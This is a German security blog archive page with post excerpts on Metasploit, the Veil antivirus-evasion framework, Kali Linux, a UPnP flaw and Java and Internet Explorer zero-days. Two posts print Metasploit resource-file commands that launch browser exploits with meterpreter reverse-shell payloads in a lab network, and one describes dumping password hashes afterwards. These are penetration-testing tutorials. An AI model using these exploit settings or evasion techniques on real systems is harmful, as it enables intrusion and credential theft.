Metasploit Archive - Seite 4 von 5

Veil Präsentation während der ShmooCon 2014

21/03/201627/01/2014

Christopher Truncer und Will Schroeder hielten diesen interessanten Vortrag während der ShmooCon 2014 in Washington, DC. Sie präsentierten das Veil-Framework und das neue Payload Delivery Tool “Veil-Catapult”. Der Vortrag beinhaltete zwei Live-Demos. [youtube AKml11-XfTA 548 365]

Metasploit Virustotal Checks

23/08/201619/01/2014

Das Metasploit-Framework und die Software Veil haben nun Möglichkeiten implementiert, selbst erstellte oder mit Schadcode versehene Dateien über den Dienst „VirusTotal“ zu untersuchen. Durch diesen Test kann geprüft werden, ob die Virenschutzprogramme der verschiedenen Hersteller die übersandte Datei als Malware einstuft oder nicht.

Die Abfrage ist unter Voraussetzung einer Internetverbindung über die Kommandozeile möglich. Dabei nutzen beide Programme die API von VirusTotal. Dabei ist eine unterschiedliche Herangehensweise bei der Übermittlung von Daten an diesen Dienst zu beobachten.

Das Metasploit-Framework übermittelt die gesamte Datei an VirusTotal und erhält eine konkrete Aussage, ob in der übermittelten Software Schadcode erkannt wurde und wie diese vom jeweiligen Hersteller bezeichnet wird. In den Nutzerbedingungen von VirusTotal ist festgelegt, dass sie diese Dateien weitergeben und verwenden dürfen. Es ist somit nicht auszuschließen, dass Daten an die jeweiligen Firmen zur weiteren Analyse weitergeleitet werden.

Mit Veil Virenschutz umgehen

27/01/201422/12/2013

Die Entwickler um Chris Truncer haben es sich zur Aufgabe gemacht, Virenschutz zu umgehen. Dies soll Penetrationstestern helfen ihre Tools und Programme einzusetzen, ohne dass das sie daran von auf dem Client PC installierten Virenschutzprogramme gehindert werden. Dies hilft die eigentlichen Sicherheitslücken auf Systemen und in Netzwerken zu erkennen und zu eliminieren.

Mit dem Metasploit-Framework sind Penetrationstester in der Lage, Payloads zu erzeugen und Exploits zu entwickeln. In der Vergangenheit wurden aber die mit diesem Framework erzeugten Payloads von den diversen Virenschutzprogrammen nach und nach erkannt.

Mit der Software Veil (engl. für Schleier) ist der Anwender nun in der Lage, Payloads in Form von Skripten oder ausführbaren Dateien zu erzeugen, die von Virenschutzprogrammen nicht mehr so leicht zu erkennen sind. Die Entwickler finden immer neuere Techniken, um ihr Ziel durchzusetzen.

Die Software ist in Python programmiert und kann in Kali Linux genutzt werden. Der nachfolgende Beitrag erklärt die Einrichtung der aktuellen Version. Außerdem werden Payloads erstellt, die dann auf einem Windows 7 PC mit installiertem Virenschutz (McAffee) getestet werden.

Kali-Linux ausgeliefert

14/03/201313/03/2013

Offensive Security hat heute den BackTrack Nachfolger Kali-Linux vorgestellt. Damit wurde ein Neustart vollzogen, der mit Altlasten aufräumt und eine effektive und flexible Nutzung in der Zukunft gewährleistet. Während BackTrack auf Ubuntu aufgebaut war, nutzt Kali-Linux nun Debian. Im Gegensatz zum Vorgänger ist Kali-Linux strukturiert aufgebaut. Dies erleichtert die Pflege des Systems und ermöglicht eine flexible Zusammenstellung der benötigten Komponenten. Der Nutzer kann aus mehreren Desktop-Umgebungen (z.B. KDE, LXDE, XFCE) auswählen und ist somit in … Weiterlesen

Schwachstelle im UPnP-Dienst

04/02/201303/02/2013

Üblicherweise wird Universal Plug and Play (UPnP) zur Ansteuerung von Geräten im lokalen Netzwerk genutzt. Dies können sowohl Audio-Geräte als auch Drucker, Router, NAS-Geräte bzw. Haushaltssteuerungen sein. Mit diesem Protokoll lassen sich Steuerbefehle über ein IP-basierendes Netzwerk austauschen und somit die Kommunikation zwischen den einzelnen Geräten komfortabel und ohne großen Konfigurationsaufwand gestalten.

Normalerweise stellt dieser Dienst in einem lokalen Netzwerk kein Problem dar. Problematisch wird es aber, wenn diese Geräte nicht nur auf Anfragen aus dem lokalen Netz antworten, sondern auch aus dem Internet.

Rapid7 fand bei eigenen Recherchen heraus, dass über 80 Millionen Geräten (sie sprechen von einzelnen IP-Adressen) über das Internet erreichbar sind. Betroffen sind davon laut Rapid7 Geräte von über 1500 Herstellern. Darunter fallen z.B. D-Link, Fujitsu, Huawei, Logitech, Netgear, Siemens, Sony, TP-Link und Zyxel. Bislang sollen Geräte von AVM (z.B. FritzBox) und der Deutschen Telekom nicht betroffen sein.

Somit bekommen potenzielle Angreifer die Gelegenheit, vorhandene Schwachstellen der Firmware der einzelnen Geräte auszunutzen und so möglicherweise in das lokale Netzwerk einzudringen.

Etwa 40 bis 50 Millionen Geräte sollen nach Rapid7 mit UPnP-Schwachstellen behaftet sein. Viele wurden schon in den letzten 12 Jahren entdeckt und diskutiert. Trotzdem setzen viele Hersteller die fehlerhafte Software als Firmware in ihren Produkten ein bzw. empfanden es nicht als notwendig, die Fehler zu beseitigen.

Java Schwachstelle CVE-2013-0422

23/02/201319/01/2013

Für die neuentdeckte Java-Schwachstelle (bis Java-Version 7 Update 10) hat Rapid7 ein Modul entwickelt, das ich in diesem Blog kurz vorstellen will. Der Exploit sollte auf den gängigen Betriebssystemen (Windows, Linux und OSX) funktionieren. Als Payload habe ich java/meterpreter/reverse_https verwendet. Zur einfacheren Handhabung kann man sich folgende Resource-Datei erstellen. use exploit/multi/browser/java_jre17_jmxbean set srvport 80 set uripath / set payload java/meterpreter/reverse_https set lport 443 set lhost 192.168.111.215 show options Der Exploit ist nicht für ältere Versionen von Java … Weiterlesen

Backtrack 5 R3 – Metasploit und GitHub

19/01/201318/01/2013

Die Metasploit-Entwickler nutzen schon seit etwa einem guten Jahr GitHub als Plattform zur Verwaltung des Quellcodes. Alle Anwender konnten aber weiterhin SVN nutzen. Dies hat aber in der letzten Zeit immer wieder zu Problemen geführt. Nutzer von Backtrack 5 R3 werden beim nächsten Upgrade des Systems automatisch auf das Git-System umgestellt.

Internet Explorer 0-Day Dezember 2012

27/01/201304/01/2013

Diese neue Sicherheitslücke im Internet Explorer wurde von Sicherheitsexperten der Firma FireEye entdeckt nachdem sie eine Analyse von kompromittierten Webseiten erstellt hatten. Durch diese Lücke hatten Angreifer Schadcode in die Systeme von IE-Nutzers einschleust, wenn sie diese speziell präparierte Webseite besucht hatten. Die Angreifer hatten zunächst mit Hilfe eins Flash-Applets Shellcode im Arbeitsspeicher verteilt (Heap Spraying), um dann unter Ausnutzung dieser IE Schwachstelle gezielt eigenen Code auszuführen.

Der Angriff war ursprünglich auf Nutzer der Systemsprache US-Englisch, Chinesisch, Japanisch, Koreanisch oder Russisch ausgerichtet. Betroffen sind die Versionen 6 bis 8 des Internet Explorers. Zum gegenwärtigen Stand ist die Sicherheitslücke nicht geschlossen.

Die Entwickler von Metasploit haben einen Exploit für diese Schwachstelle entwickelt. Nach meinen Test funktioniert er derzeit nur auf englischsprachigen Systemen. Im nachfolgenden Video nutze ich Windows XP Home. Interessant ist auch hier, dass der installierte Virenschutz (hier Microsoft Security Essentials in der aktuellen Version) keine Hürde darstellt.

London 2012 – SANS Security 560

18/01/201303/12/2012

Greetings to all participants! Special Thanks to the London 2012-SANS 560 Team, particularly to Bryce Galbraith as an excellent instructor.

Greetings to Markus and the rest of the winning team. Good luck for the future.

Für den Lehrgang sollte ein eigener Laptop zur Verfügung stehen. Als Hostbetriebssystem eignet sich Windows, Linux oder MacOS. Als Software sollte VMWare Player oder Workstation vorhanden sein. Ein VMWare- Image (Linux-Fedora) mit allen Tools wird auf DVD zur Verfügung gestellt. Die Verwendung eines Windows-Systems (als VMWare oder als Host) ist dringend zu empfehlen. Hier ein Überblick über den Inhalt des Kurses:

Internet Explorer 0-Day – Metasploit-Modul

23/08/201618/09/2012

Am 17.09.2012 wurde eine kritische Schwachstelle Microsoft Internet Explorer bekannt. Betroffen sind IT-Systeme, die die Software in den Versionen 6, 7, 8 oder 9 unter den Betriebssystemen Microsoft Windows XP, Microsoft Windows Vista oder Microsoft Windows 7 verwenden. Die Schwachstelle wird bereits in gezielten Angriffen ausgenutzt. Um die Schwachstelle auszunutzen reicht es aus, den Internetnutzer auf eine präparierte Webseite zu locken. Beim Anzeigen dieser Webseite kann dann durch Ausnutzen der Schwachstelle beliebiger Code auf dem betroffenen System mit den Rechten des Nutzers ausgeführt werden.

Um die eigenen Systeme testen zu können, wurde ein Metasploit-Modul herausgebraucht.

Im Folgenden wird die Handhabung in einem Testnetzwerk kurz beschrieben und in einem Video erläutert. Der Angreifer nutzt Backtrack 5 R3 (IP: 192.168.222.16) und das Metasploit-Framework. Auf dem Zielsystem (IP: 192.168.222.71) ist Windows 7 und der Internet Explorer 8 installiert.

Mittels der folgenden Resource-Datei (ie0day.rc) wird das entsprechende Module geladen, die Serverparameter eingestellt und der Payload ausgewählt. Nach der Ausführung nimmt das Angriffssystem „Anfragen“ auf Port 80 entgegen.

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.222.16
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.222.16
set LPORT 443
set URIPATH /
exploit

Sobald das Zielsytem die URL http://192.168.222.16 im Internet Explorer öffnet, wird der Exploit ausgeführt und der entsprechende Payload (in diesem Fall windows/meterpreter/reverse_https) nachgeladen. Nun können beliebige Meterpreter-Skripte ausgeführt werden. Im Video werden die Nutzerrechte zu Systemrechten eskaliert und die Passwort-Hashes ausgelesen.